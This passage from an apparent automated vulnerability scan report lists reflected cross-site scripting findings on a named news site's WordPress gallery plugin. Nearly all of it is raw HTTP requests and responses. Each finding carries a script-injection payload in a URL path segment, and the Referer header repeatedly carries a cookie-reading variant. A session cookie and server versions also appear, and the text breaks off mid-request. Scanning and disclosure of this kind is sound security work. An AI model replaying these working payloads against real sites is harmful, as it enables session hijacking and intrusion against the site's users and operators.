The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c0586"><script>alert(1)</script>6a63903b8c8 was submitted in the REST URL parameter 6. This input was echoed as c0586\"><script>alert(1)</script>6a63903b8c8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/plugins/nextgen-smooth-gallery/SmoothGallery/css/jd.gallery.cssc0586"><script>alert(1)</script>6a63903b8c8 HTTP/1.1
Host: starscene.dailystar.com.lb
Proxy-Connection: keep-alive
Referer: http://starscene.dailystar.com.lb/music-scenea960d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb7d5247b69c/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/x22
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=rqv6492k0k62as9elpq6dhnaj2; crep=show

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 22:23:10 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
X-Pingback: http://starscene.dailystar.com.lb/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: crep=show; expires=Tue, 25-Jan-2011 22:23:12 GMT; path=/; domain=.starscene.dailystar.com.lb
Last-Modified: Mon, 24 Jan 2011 22:23:12 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 51079

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<a href="#" onclick="FB.Connect.requireSession(function() { window.location='/wp-content/plugins/nextgen-smooth-gallery/SmoothGallery/css/jd.gallery.cssc0586\"><script>alert(1)</script>6a63903b8c8'; }); return true;" >
...[SNIP]...

4.271. http://starscene.dailystar.com.lb/wp-content/plugins/nextgen-smooth-gallery/SmoothGallery/scripts/jd.gallery.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://starscene.dailystar.com.lb
Path:   /wp-content/plugins/nextgen-smooth-gallery/SmoothGallery/scripts/jd.gallery.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 26543"><script>alert(1)</script>022d4cef610 was submitted in the REST URL parameter 1. This input was echoed as 26543\"><script>alert(1)</script>022d4cef610 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content26543"><script>alert(1)</script>022d4cef610/plugins/nextgen-smooth-gallery/SmoothGallery/scripts/jd.gallery.js HTTP/1.1
Host: starscene.dailystar.com.lb
Proxy-Connection: keep-alive
Referer: http://starscene.dailystar.com.lb/music-scenea960d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb7d5247b69c/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/x22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=rqv6492k0k62as9elpq6dhnaj2; crep=show

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 22:19:18 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
X-Pingback: http://starscene.dailystar.com.lb/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: crep=show; expires=Tue, 25-Jan-2011 22:19:19 GMT; path=/; domain=.starscene.dailystar.com.lb
Last-Modified: Mon, 24 Jan 2011 22:19:19 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 51085

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<a href="#" onclick="FB.Connect.requireSession(function() { window.location='/wp-content26543\"><script>alert(1)</script>022d4cef610/plugins/nextgen-smooth-gallery/SmoothGallery/scripts/jd.gallery.js'; }); return true;" >
...[SNIP]...

4.272. http://starscene.dailystar.com.lb/wp-content/plugins/nextgen-smooth-gallery/SmoothGallery/scripts/jd.gallery.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://starscene.dailystar.com.lb
Path:   /wp-content/plugins/nextgen-smooth-gallery/SmoothGallery/scripts/jd.gallery.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 41322"><script>alert(1)</script>74e5a90858e was submitted in the REST URL parameter 2. This input was echoed as 41322\"><script>alert(1)</script>74e5a90858e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/plugins41322"><script>alert(1)</script>74e5a90858e/nextgen-smooth-gallery/SmoothGallery/scripts/jd.gallery.js HTTP/1.1
Host: starscene.dailystar.com.lb
Proxy-Connection: keep-alive
Referer: http://starscene.dailystar.com.lb/music-scenea960d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb7d5247b69c/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/x22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=rqv6492k0k62as9elpq6dhnaj2; crep=show

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 22:20:28 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
X-Pingback: http://starscene.dailystar.com.lb/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: crep=show; expires=Tue, 25-Jan-2011 22:20:28 GMT; path=/; domain=.starscene.dailystar.com.lb
Last-Modified: Mon, 24 Jan 2011 22:20:28 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 51085

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<a href="#" onclick="FB.Connect.requireSession(function() { window.location='/wp-content/plugins41322\"><script>alert(1)</script>74e5a90858e/nextgen-smooth-gallery/SmoothGallery/scripts/jd.gallery.js'; }); return true;" >
...[SNIP]...

4.273. http://starscene.dailystar.com.lb/wp-content/plugins/nextgen-smooth-gallery/SmoothGallery/scripts/jd.gallery.js [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://starscene.dailystar.com.lb
Path:   /wp-content/plugins/nextgen-smooth-gallery/SmoothGallery/scripts/jd.gallery.js

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 89d9a"><script>alert(1)</script>d4a9b58102d was submitted in the REST URL parameter 3. This input was echoed as 89d9a\"><script>alert(1)</script>d4a9b58102d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/plugins/nextgen-smooth-gallery89d9a"><script>alert(1)</script>d4a9b58102d/SmoothGallery/scripts/jd.gallery.js HTTP/1.1
Host: starscene.dailystar.com.lb
Proxy-Connection: keep-alive
Referer: http://starscene.dailystar.com.lb/music-scenea960d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb7d5247b69c/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/x22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=rqv6492k0k62as9elpq6dhnaj2; crep=show

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 22:21:13 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
X-Pingback: http://starscene.dailystar.com.lb/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: crep=show; expires=Tue, 25-Jan-2011 22:21:13 GMT; path=/; domain=.starscene.dailystar.com.lb
Last-Modified: Mon, 24 Jan 2011 22:21:13 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 51085

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<a href="#" onclick="FB.Connect.requireSession(function() { window.location='/wp-content/plugins/nextgen-smooth-gallery89d9a\"><script>alert(1)</script>d4a9b58102d/SmoothGallery/scripts/jd.gallery.js'; }); return true;" >
...[SNIP]...

4.274. http://starscene.dailystar.com.lb/wp-content/plugins/nextgen-smooth-gallery/SmoothGallery/scripts/jd.gallery.js [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://starscene.dailystar.com.lb
Path:   /wp-content/plugins/nextgen-smooth-gallery/SmoothGallery/scripts/jd.gallery.js

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ac37c"><script>alert(1)</script>27d3f8281f2 was submitted in the REST URL parameter 4. This input was echoed as ac37c\"><script>alert(1)</script>27d3f8281f2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/plugins/nextgen-smooth-gallery/SmoothGalleryac37c"><script>alert(1)</script>27d3f8281f2/scripts/jd.gallery.js HTTP/1.1
Host: starscene.dailystar.com.lb
Proxy-Connection: keep-alive
Referer: http://starscene.dailystar.com.lb/music-scenea960d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb7d5247b69c/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/x22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=rqv6492k0k62as9elpq6dhnaj2; crep=show

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 22:22:08 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
X-Pingback: http://starscene.dailystar.com.lb/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: crep=show; expires=Tue, 25-Jan-2011 22:22:11 GMT; path=/; domain=.starscene.dailystar.com.lb
Last-Modified: Mon, 24 Jan 2011 22:22:11 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 51085

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<a href="#" onclick="FB.Connect.requireSession(function() { window.location='/wp-content/plugins/nextgen-smooth-gallery/SmoothGalleryac37c\"><script>alert(1)</script>27d3f8281f2/scripts/jd.gallery.js'; }); return true;" >
...[SNIP]...

4.275. http://starscene.dailystar.com.lb/wp-content/plugins/nextgen-smooth-gallery/SmoothGallery/scripts/jd.gallery.js [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://starscene.dailystar.com.lb
Path:   /wp-content/plugins/nextgen-smooth-gallery/SmoothGallery/scripts/jd.gallery.js

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload efc96"><script>alert(1)</script>9d117380136 was submitted in the REST URL parameter 5. This input was echoed as efc96\"><script>alert(1)</script>9d117380136 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/plugins/nextgen-smooth-gallery/SmoothGallery/scriptsefc96"><script>alert(1)</script>9d117380136/jd.gallery.js HTTP/1.1
Host: starscene.dailystar.com.lb
Proxy-Connection: keep-alive
Referer: http://starscene.dailystar.com.lb/music-scenea960d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb7d5247b69c/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/x22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=rqv6492k0k62as9elpq6dhnaj2; crep=show

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 22:23:13 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
X-Pingback: http://starscene.dailystar.com.lb/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: crep=show; expires=Tue, 25-Jan-2011 22:23:15 GMT; path=/; domain=.starscene.dailystar.com.lb
Last-Modified: Mon, 24 Jan 2011 22:23:15 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 51085

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<a href="#" onclick="FB.Connect.requireSession(function() { window.location='/wp-content/plugins/nextgen-smooth-gallery/SmoothGallery/scriptsefc96\"><script>alert(1)</script>9d117380136/jd.gallery.js'; }); return true;" >
...[SNIP]...

4.276. http://starscene.dailystar.com.lb/wp-content/plugins/nextgen-smooth-gallery/SmoothGallery/scripts/jd.gallery.js [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://starscene.dailystar.com.lb
Path:   /wp-content/plugins/nextgen-smooth-gallery/SmoothGallery/scripts/jd.gallery.js

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3174f"><script>alert(1)</script>9f37b5db3df was submitted in the REST URL parameter 6. This input was echoed as 3174f\"><script>alert(1)</script>9f37b5db3df in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/plugins/nextgen-smooth-gallery/SmoothGallery/scripts/jd.gallery.js3174f"><script>alert(1)</script>9f37b5db3df HTTP/1.1
Host: starscene.dailystar.com.lb
Proxy-Connection: keep-alive
Referer: http://starscene.dailystar.com.lb/music-scenea960d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb7d5247b69c/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/x22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=rqv6492k0k62as9elpq6dhnaj2; crep=show

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 22:24:16 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
X-Pingback: http://starscene.dailystar.com.lb/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: crep=show; expires=Tue, 25-Jan-2011 22:24:18 GMT; path=/; domain=.starscene.dailystar.com.lb
Last-Modified: Mon, 24 Jan 2011 22:24:18 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 51085

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<a href="#" onclick="FB.Connect.requireSession(function() { window.location='/wp-content/plugins/nextgen-smooth-gallery/SmoothGallery/scripts/jd.gallery.js3174f\"><script>alert(1)</script>9f37b5db3df'; }); return true;" >
...[SNIP]...

4.277. http://starscene.dailystar.com.lb/wp-content/plugins/nextgen-smooth-gallery/SmoothGallery/scripts/jd.gallery.transitions.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://starscene.dailystar.com.lb
Path:   /wp-content/plugins/nextgen-smooth-gallery/SmoothGallery/scripts/jd.gallery.transitions.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9e056"><script>alert(1)</script>02c4b7b6fdd was submitted in the REST URL parameter 1. This input was echoed as 9e056\"><script>alert(1)</script>02c4b7b6fdd in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content9e056"><script>alert(1)</script>02c4b7b6fdd/plugins/nextgen-smooth-gallery/SmoothGallery/scripts/jd.gallery.transitions.js HTTP/1.1
Host: starscene.dailystar.com.lb
Proxy-Connection: keep-alive
Referer: http://starscene.dailystar.com.lb/music-scenea960d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb7d5247b69c/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/x22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=rqv6492k0k62as9elpq6dhnaj2; crep=show

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 22:18:46 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
X-Pingback: http://starscene.dailystar.com.lb/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: crep=show; expires=Tue, 25-Jan-2011 22:18:50 GMT; path=/; domain=.starscene.dailystar.com.lb
Last-Modified: Mon, 24 Jan 2011 22:18:50 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 51109

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<a href="#" onclick="FB.Connect.requireSession(function() { window.location='/wp-content9e056\"><script>alert(1)</script>02c4b7b6fdd/plugins/nextgen-smooth-gallery/SmoothGallery/scripts/jd.gallery.transitions.js'; }); return true;" >
...[SNIP]...

4.278. http://starscene.dailystar.com.lb/wp-content/plugins/nextgen-smooth-gallery/SmoothGallery/scripts/jd.gallery.transitions.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://starscene.dailystar.com.lb
Path:   /wp-content/plugins/nextgen-smooth-gallery/SmoothGallery/scripts/jd.gallery.transitions.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c839d"><script>alert(1)</script>7284c39bd27 was submitted in the REST URL parameter 2. This input was echoed as c839d\"><script>alert(1)</script>7284c39bd27 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/pluginsc839d"><script>alert(1)</script>7284c39bd27/nextgen-smooth-gallery/SmoothGallery/scripts/jd.gallery.transitions.js HTTP/1.1
Host: starscene.dailystar.com.lb
Proxy-Connection: keep-alive
Referer: http://starscene.dailystar.com.lb/music-scenea960d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb7d5247b69c/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/x22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=rqv6492k0k62as9elpq6dhnaj2; crep=show

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 22:20:00 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
X-Pingback: http://starscene.dailystar.com.lb/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: crep=show; expires=Tue, 25-Jan-2011 22:20:04 GMT; path=/; domain=.starscene.dailystar.com.lb
Last-Modified: Mon, 24 Jan 2011 22:20:04 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 51109

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<a href="#" onclick="FB.Connect.requireSession(function() { window.location='/wp-content/pluginsc839d\"><script>alert(1)</script>7284c39bd27/nextgen-smooth-gallery/SmoothGallery/scripts/jd.gallery.transitions.js'; }); return true;" >
...[SNIP]...

4.279. http://starscene.dailystar.com.lb/wp-content/plugins/nextgen-smooth-gallery/SmoothGallery/scripts/jd.gallery.transitions.js [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://starscene.dailystar.com.lb
Path:   /wp-content/plugins/nextgen-smooth-gallery/SmoothGallery/scripts/jd.gallery.transitions.js

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e3ac9"><script>alert(1)</script>441c81ccd97 was submitted in the REST URL parameter 3. This input was echoed as e3ac9\"><script>alert(1)</script>441c81ccd97 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/plugins/nextgen-smooth-gallerye3ac9"><script>alert(1)</script>441c81ccd97/SmoothGallery/scripts/jd.gallery.transitions.js HTTP/1.1
Host: starscene.dailystar.com.lb
Proxy-Connection: keep-alive
Referer: http://starscene.dailystar.com.lb/music-scenea960d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb7d5247b69c/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/x22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=rqv6492k0k62as9elpq6dhnaj2; crep=show

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 22:20:51 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
X-Pingback: http://starscene.dailystar.com.lb/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: crep=show; expires=Tue, 25-Jan-2011 22:20:52 GMT; path=/; domain=.starscene.dailystar.com.lb
Last-Modified: Mon, 24 Jan 2011 22:20:52 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 51109

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<a href="#" onclick="FB.Connect.requireSession(function() { window.location='/wp-content/plugins/nextgen-smooth-gallerye3ac9\"><script>alert(1)</script>441c81ccd97/SmoothGallery/scripts/jd.gallery.transitions.js'; }); return true;" >
...[SNIP]...

4.280. http://starscene.dailystar.com.lb/wp-content/plugins/nextgen-smooth-gallery/SmoothGallery/scripts/jd.gallery.transitions.js [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://starscene.dailystar.com.lb
Path:   /wp-content/plugins/nextgen-smooth-gallery/SmoothGallery/scripts/jd.gallery.transitions.js

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1c990"><script>alert(1)</script>1062e2d3ae1 was submitted in the REST URL parameter 4. This input was echoed as 1c990\"><script>alert(1)</script>1062e2d3ae1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/plugins/nextgen-smooth-gallery/SmoothGallery1c990"><script>alert(1)</script>1062e2d3ae1/scripts/jd.gallery.transitions.js HTTP/1.1
Host: starscene.dailystar.com.lb
Proxy-Connection: keep-alive
Referer: http://starscene.dailystar.com.lb/music-scenea960d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb7d5247b69c/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/x22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=rqv6492k0k62as9elpq6dhnaj2; crep=show

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 22:21:42 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
X-Pingback: http://starscene.dailystar.com.lb/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: crep=show; expires=Tue, 25-Jan-2011 22:21:44 GMT; path=/; domain=.starscene.dailystar.com.lb
Last-Modified: Mon, 24 Jan 2011 22:21:44 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 51109

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<a href="#" onclick="FB.Connect.requireSession(function() { window.location='/wp-content/plugins/nextgen-smooth-gallery/SmoothGallery1c990\"><script>alert(1)</script>1062e2d3ae1/scripts/jd.gallery.transitions.js'; }); return true;" >
...[SNIP]...

4.281. http://starscene.dailystar.com.lb/wp-content/plugins/nextgen-smooth-gallery/SmoothGallery/scripts/jd.gallery.transitions.js [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://starscene.dailystar.com.lb
Path:   /wp-content/plugins/nextgen-smooth-gallery/SmoothGallery/scripts/jd.gallery.transitions.js

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dba45"><script>alert(1)</script>288fa1eb525 was submitted in the REST URL parameter 5. This input was echoed as dba45\"><script>alert(1)</script>288fa1eb525 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/plugins/nextgen-smooth-gallery/SmoothGallery/scriptsdba45"><script>alert(1)</script>288fa1eb525/jd.gallery.transitions.js HTTP/1.1
Host: starscene.dailystar.com.lb
Proxy-Connection: keep-alive
